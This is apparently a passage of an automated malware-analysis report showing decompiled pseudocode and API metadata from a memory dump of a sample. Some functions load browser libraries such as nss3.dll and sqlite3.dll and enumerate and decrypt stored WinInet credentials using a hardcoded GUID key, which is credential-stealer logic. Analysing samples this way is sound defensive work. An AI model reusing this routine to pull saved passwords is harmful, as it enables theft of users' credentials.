                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHandleLibraryModule
                                                                                                                                                                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                                                                                  • API String ID: 662261464-3550686275
                                                                                                                                                                  • Opcode ID: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                                                                                                                                                                  • Instruction ID: d135409c02d172e6769d1cedb18aaef1940c31153c91c0802dc404148c0ad013
                                                                                                                                                                  • Opcode Fuzzy Hash: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 31E048E6B4133D7689106AF65C44DBBAE5CC885AE63150877AD0473284EEA99D0186F8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E7E3, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E0040E7E3(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E00406A01(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E0040632F( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E0040632F( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                                  0x0040e7e3
                                                                                                                                                                  0x0040e7e3
                                                                                                                                                                  0x0040e7f0
                                                                                                                                                                  0x0040e7fb
                                                                                                                                                                  0x0040e804
                                                                                                                                                                  0x0040e824
                                                                                                                                                                  0x0040e829
                                                                                                                                                                  0x0040e871
                                                                                                                                                                  0x0040e8ba
                                                                                                                                                                  0x0040e873
                                                                                                                                                                  0x0040e881
                                                                                                                                                                  0x0040e888
                                                                                                                                                                  0x0040e894
                                                                                                                                                                  0x0040e8a3
                                                                                                                                                                  0x0040e8aa
                                                                                                                                                                  0x0040e8ae
                                                                                                                                                                  0x0040e8b3
                                                                                                                                                                  0x0040e82b
                                                                                                                                                                  0x0040e839
                                                                                                                                                                  0x0040e840
                                                                                                                                                                  0x0040e84c
                                                                                                                                                                  0x0040e859
                                                                                                                                                                  0x0040e85e
                                                                                                                                                                  0x0040e864
                                                                                                                                                                  0x0040e869
                                                                                                                                                                  0x0040e8c2
                                                                                                                                                                  0x0040e8c5
                                                                                                                                                                  0x0040e8c5
                                                                                                                                                                  0x0040e807
                                                                                                                                                                  0x0040e808
                                                                                                                                                                  0x0040e809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e80f
                                                                                                                                                                  0x0040e7f2
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • strchr.MSVCRT ref: 0040E7FB
                                                                                                                                                                  • strcpy.MSVCRT(?,-00000001), ref: 0040E809
                                                                                                                                                                    • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A13
                                                                                                                                                                    • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A1B
                                                                                                                                                                    • Part of subcall function 00406A01: _memicmp.MSVCRT ref: 00406A39
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E859
                                                                                                                                                                  • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E864
                                                                                                                                                                  • memset.MSVCRT ref: 0040E840
                                                                                                                                                                    • Part of subcall function 0040632F: GetWindowsDirectoryA.KERNEL32(00418550,00000104,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406344
                                                                                                                                                                    • Part of subcall function 0040632F: strcpy.MSVCRT(00000000,00418550,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406354
                                                                                                                                                                  • memset.MSVCRT ref: 0040E888
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E8A3
                                                                                                                                                                  • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E8AE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                  • API String ID: 1680921474-1821301763
                                                                                                                                                                  • Opcode ID: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                                                                                                                                                                  • Instruction ID: 059b6355fafdf26fa7c647f60efba09ddadb95c968e3db809f61c631ea6cdf1b
                                                                                                                                                                  • Opcode Fuzzy Hash: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                                                                                                                                                                  • Instruction Fuzzy Hash: D321DA725082446DF764B2628D82FEB66EC5B19344F10446FF685E10C1EAFC99D4862A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405BEE, Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E00405BEE(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401601(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				__eax = GetDlgItem( *(__ebx + 4), 0x3ed);
				"VWh\\MA"();
				 *__esp = 0x3ee;
				__eax = GetDlgItem( *(__ebx + 4), __eax);
				"VWh\\MA"();
				 *__esp = 0x3ef;
				__eax = GetDlgItem( *(__ebx + 4), __eax);
				"VWh\\MA"();
				 *__esp = 0x3f4;
				"VWh\\MA"();
				__eax =  *(__ebx + 4);
				__ecx = __eax;
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E0040649B(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}









                                                                                                                                                                  0x00405bee
                                                                                                                                                                  0x00405bee
                                                                                                                                                                  0x00405bee
                                                                                                                                                                  0x00405bf3
                                                                                                                                                                  0x00405bf4
                                                                                                                                                                  0x00405bf7
                                                                                                                                                                  0x00405c02
                                                                                                                                                                  0x00405c05
                                                                                                                                                                  0x00405c11
                                                                                                                                                                  0x00405c20
                                                                                                                                                                  0x00405c24
                                                                                                                                                                  0x00405c24
                                                                                                                                                                  0x00405c2e
                                                                                                                                                                  0x00405c30
                                                                                                                                                                  0x00405c34
                                                                                                                                                                  0x00405c3a
                                                                                                                                                                  0x00405c43
                                                                                                                                                                  0x00405c46
                                                                                                                                                                  0x00405c4b
                                                                                                                                                                  0x00405c55
                                                                                                                                                                  0x00405c58
                                                                                                                                                                  0x00405c5d
                                                                                                                                                                  0x00405c67
                                                                                                                                                                  0x00405c6a
                                                                                                                                                                  0x00405c6f
                                                                                                                                                                  0x00405c7c
                                                                                                                                                                  0x00405c81
                                                                                                                                                                  0x00405c84
                                                                                                                                                                  0x00405c8a
                                                                                                                                                                  0x00405c90
                                                                                                                                                                  0x00405c91
                                                                                                                                                                  0x00405c93
                                                                                                                                                                  0x00405c95
                                                                                                                                                                  0x004015e4
                                                                                                                                                                  0x004015ea
                                                                                                                                                                  0x004015f1
                                                                                                                                                                  0x004015f7
                                                                                                                                                                  0x00401600

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32 ref: 00405C05
                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405C1D
                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00401601: GetWindowRect.USER32 ref: 00401610
                                                                                                                                                                    • Part of subcall function 00401601: MapWindowPoints.USER32 ref: 0040162B
                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405C2C
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C43
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C55
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C67
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C79
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C87
                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00405C8A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2187283481-0
                                                                                                                                                                  • Opcode ID: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                  • Instruction ID: 70b7e768433fb03072553d07e5bd29f06e019e0bb4b5ab736e3f65cd75bfe615
                                                                                                                                                                  • Opcode Fuzzy Hash: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 09118271500304ABDB216F31CC89E5BBFADEF81715F05883AB444AB1A1CB7DD8018B28
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401A0F, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E00401A0F(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045F2( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x4155a0;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x4155a8;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x4155b0;
								} else {
									L30:
									_t159 = _t165 +  *0x4155b8;
								}
								goto L41;
							}
						} else {
							E004045F2( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x415598;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L00412066();
					_v36 = _t159;
					 *_t125 =  *0x415590;
					L00412066();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                                                                                                                                  0x00401a0f
                                                                                                                                                                  0x00401a0f
                                                                                                                                                                  0x00401a15
                                                                                                                                                                  0x00401a1b
                                                                                                                                                                  0x00401a20
                                                                                                                                                                  0x00401a22
                                                                                                                                                                  0x00401a24
                                                                                                                                                                  0x00401a28
                                                                                                                                                                  0x00401a2c
                                                                                                                                                                  0x00401a2d
                                                                                                                                                                  0x00401a31
                                                                                                                                                                  0x00401a35
                                                                                                                                                                  0x00401a39
                                                                                                                                                                  0x00401a3d
                                                                                                                                                                  0x00401a41
                                                                                                                                                                  0x00401a45
                                                                                                                                                                  0x00401a49
                                                                                                                                                                  0x00401a51
                                                                                                                                                                  0x00401a55
                                                                                                                                                                  0x00401a59
                                                                                                                                                                  0x00401a5d
                                                                                                                                                                  0x00401a63
                                                                                                                                                                  0x00401a63
                                                                                                                                                                  0x00401a6c
                                                                                                                                                                  0x00401a70
                                                                                                                                                                  0x00401a72
                                                                                                                                                                  0x00401a72
                                                                                                                                                                  0x00401a7c
                                                                                                                                                                  0x00401a7e
                                                                                                                                                                  0x00401a7e
                                                                                                                                                                  0x00401a88
                                                                                                                                                                  0x00401a8a
                                                                                                                                                                  0x00401a8a
                                                                                                                                                                  0x00401a94
                                                                                                                                                                  0x00401a96
                                                                                                                                                                  0x00401a96
                                                                                                                                                                  0x00401aa0
                                                                                                                                                                  0x00401aa2
                                                                                                                                                                  0x00401aa2
                                                                                                                                                                  0x00401aac
                                                                                                                                                                  0x00401aae
                                                                                                                                                                  0x00401aae
                                                                                                                                                                  0x00401ab5
                                                                                                                                                                  0x00401ac0
                                                                                                                                                                  0x00401ac3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401ab7
                                                                                                                                                                  0x00401aba
                                                                                                                                                                  0x00401ac5
                                                                                                                                                                  0x00401ac5
                                                                                                                                                                  0x00401abc
                                                                                                                                                                  0x00401abc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401abc
                                                                                                                                                                  0x00401aba
                                                                                                                                                                  0x00401acb
                                                                                                                                                                  0x00401adf
                                                                                                                                                                  0x00401ae5
                                                                                                                                                                  0x00401b07
                                                                                                                                                                  0x00401b07
                                                                                                                                                                  0x00401ae7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401ae7
                                                                                                                                                                  0x00401ae9
                                                                                                                                                                  0x00401afa
                                                                                                                                                                  0x00401af1
                                                                                                                                                                  0x00401af5
                                                                                                                                                                  0x00401af5
                                                                                                                                                                  0x00401afe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b00
                                                                                                                                                                  0x00401b05
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b05
                                                                                                                                                                  0x00401b0a
                                                                                                                                                                  0x00401b0a
                                                                                                                                                                  0x00401b0e
                                                                                                                                                                  0x00401b41
                                                                                                                                                                  0x00401b52
                                                                                                                                                                  0x00401b5a
                                                                                                                                                                  0x00401b5b
                                                                                                                                                                  0x00401b63
                                                                                                                                                                  0x00401b63
                                                                                                                                                                  0x00401b69
                                                                                                                                                                  0x00401b7a
                                                                                                                                                                  0x00401b90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b7c
                                                                                                                                                                  0x00401b7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b81
                                                                                                                                                                  0x00401b85
                                                                                                                                                                  0x00401b85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b7f
                                                                                                                                                                  0x00401b6b
                                                                                                                                                                  0x00401b6f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b6f
                                                                                                                                                                  0x00401b5d
                                                                                                                                                                  0x00401b5d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b5d
                                                                                                                                                                  0x00401b10
                                                                                                                                                                  0x00401b1b
                                                                                                                                                                  0x00401b22
                                                                                                                                                                  0x00401b26
                                                                                                                                                                  0x00401b27
                                                                                                                                                                  0x00401b31
                                                                                                                                                                  0x00401b29
                                                                                                                                                                  0x00401b29
                                                                                                                                                                  0x00401b29
                                                                                                                                                                  0x00401b29
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401b27
                                                                                                                                                                  0x00401acd
                                                                                                                                                                  0x00401ad5
                                                                                                                                                                  0x00401b92
                                                                                                                                                                  0x00401b96
                                                                                                                                                                  0x00401b9c
                                                                                                                                                                  0x00401b9c
                                                                                                                                                                  0x00401b9c
                                                                                                                                                                  0x00401ba0
                                                                                                                                                                  0x00401ba1
                                                                                                                                                                  0x00401a63
                                                                                                                                                                  0x00401bb1
                                                                                                                                                                  0x00401bb5
                                                                                                                                                                  0x00401bb6
                                                                                                                                                                  0x00401bb8
                                                                                                                                                                  0x00401bb8
                                                                                                                                                                  0x00401bc0
                                                                                                                                                                  0x00401bc2
                                                                                                                                                                  0x00401bc2
                                                                                                                                                                  0x00401bca
                                                                                                                                                                  0x00401bcc
                                                                                                                                                                  0x00401bcc
                                                                                                                                                                  0x00401bd5
                                                                                                                                                                  0x00401bd7
                                                                                                                                                                  0x00401bd7
                                                                                                                                                                  0x00401be0
                                                                                                                                                                  0x00401be2
                                                                                                                                                                  0x00401be2
                                                                                                                                                                  0x00401beb
                                                                                                                                                                  0x00401bed
                                                                                                                                                                  0x00401bed
                                                                                                                                                                  0x00401bf6
                                                                                                                                                                  0x00401c42
                                                                                                                                                                  0x00401c48
                                                                                                                                                                  0x00401c4d
                                                                                                                                                                  0x00401c4e
                                                                                                                                                                  0x00401bf8
                                                                                                                                                                  0x00401bf8
                                                                                                                                                                  0x00401bfc
                                                                                                                                                                  0x00401bfd
                                                                                                                                                                  0x00401bfe
                                                                                                                                                                  0x00401c01
                                                                                                                                                                  0x00401c06
                                                                                                                                                                  0x00401c10
                                                                                                                                                                  0x00401c13
                                                                                                                                                                  0x00401c1c
                                                                                                                                                                  0x00401c26
                                                                                                                                                                  0x00401c2a
                                                                                                                                                                  0x00401c2e
                                                                                                                                                                  0x00401c34
                                                                                                                                                                  0x00401c39
                                                                                                                                                                  0x00401c3a
                                                                                                                                                                  0x00401c3a
                                                                                                                                                                  0x00401c55

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 667451143-3916222277
                                                                                                                                                                  • Opcode ID: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                                                                                                                                                                  • Instruction ID: 0a6132ce2dc9cc3df9a7f1a3dcc42749ccde8b25e91b24a7214be5fd0ed86434
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                                                                                                                                                                  • Instruction Fuzzy Hash: A7619A30409781DFDB209F25848006BBBF1FB89315F909D7FF5D5A22A1E739A846CB0A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004077C5, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E004077C5(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404651( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x418968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x418968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046E1( &_v532);
									if(E004047AA( &_v532, _t152) != 0 && E0040481B(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4135f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047FB( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046CC( &_v1108);
			}















































                                                                                                                                                                  0x004077cb
                                                                                                                                                                  0x004077d5
                                                                                                                                                                  0x004077da
                                                                                                                                                                  0x004077de
                                                                                                                                                                  0x004077e9
                                                                                                                                                                  0x004077f3
                                                                                                                                                                  0x004077f7
                                                                                                                                                                  0x004077fb
                                                                                                                                                                  0x00407812
                                                                                                                                                                  0x00407812
                                                                                                                                                                  0x004077fd
                                                                                                                                                                  0x00407809
                                                                                                                                                                  0x00407809
                                                                                                                                                                  0x00407816
                                                                                                                                                                  0x0040781e
                                                                                                                                                                  0x0040782d
                                                                                                                                                                  0x0040782d
                                                                                                                                                                  0x00407839
                                                                                                                                                                  0x0040783d
                                                                                                                                                                  0x00407845
                                                                                                                                                                  0x00407849
                                                                                                                                                                  0x0040784f
                                                                                                                                                                  0x00407861
                                                                                                                                                                  0x00407873
                                                                                                                                                                  0x00407878
                                                                                                                                                                  0x0040787d
                                                                                                                                                                  0x00407883
                                                                                                                                                                  0x00407883
                                                                                                                                                                  0x0040788e
                                                                                                                                                                  0x00407896
                                                                                                                                                                  0x00407897
                                                                                                                                                                  0x00407897
                                                                                                                                                                  0x0040789f
                                                                                                                                                                  0x004078a6
                                                                                                                                                                  0x004078ad
                                                                                                                                                                  0x004078b5
                                                                                                                                                                  0x004078bd
                                                                                                                                                                  0x004078c1
                                                                                                                                                                  0x004078cd
                                                                                                                                                                  0x004078ff
                                                                                                                                                                  0x00407907
                                                                                                                                                                  0x0040790c
                                                                                                                                                                  0x00407915
                                                                                                                                                                  0x0040791a
                                                                                                                                                                  0x0040791c
                                                                                                                                                                  0x0040791c
                                                                                                                                                                  0x0040792b
                                                                                                                                                                  0x00407933
                                                                                                                                                                  0x0040793a
                                                                                                                                                                  0x00407941
                                                                                                                                                                  0x00407948
                                                                                                                                                                  0x0040794f
                                                                                                                                                                  0x00407956
                                                                                                                                                                  0x0040795d
                                                                                                                                                                  0x00407961
                                                                                                                                                                  0x0040796b
                                                                                                                                                                  0x00407973
                                                                                                                                                                  0x00407977
                                                                                                                                                                  0x0040797f
                                                                                                                                                                  0x00407984
                                                                                                                                                                  0x00407989
                                                                                                                                                                  0x0040798b
                                                                                                                                                                  0x00407991
                                                                                                                                                                  0x00407991
                                                                                                                                                                  0x004079a5
                                                                                                                                                                  0x004079a9
                                                                                                                                                                  0x004079a9
                                                                                                                                                                  0x004079b6
                                                                                                                                                                  0x004079b6
                                                                                                                                                                  0x004079bb
                                                                                                                                                                  0x004079c7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004079c7
                                                                                                                                                                  0x0040784f
                                                                                                                                                                  0x004079cd
                                                                                                                                                                  0x004079d1
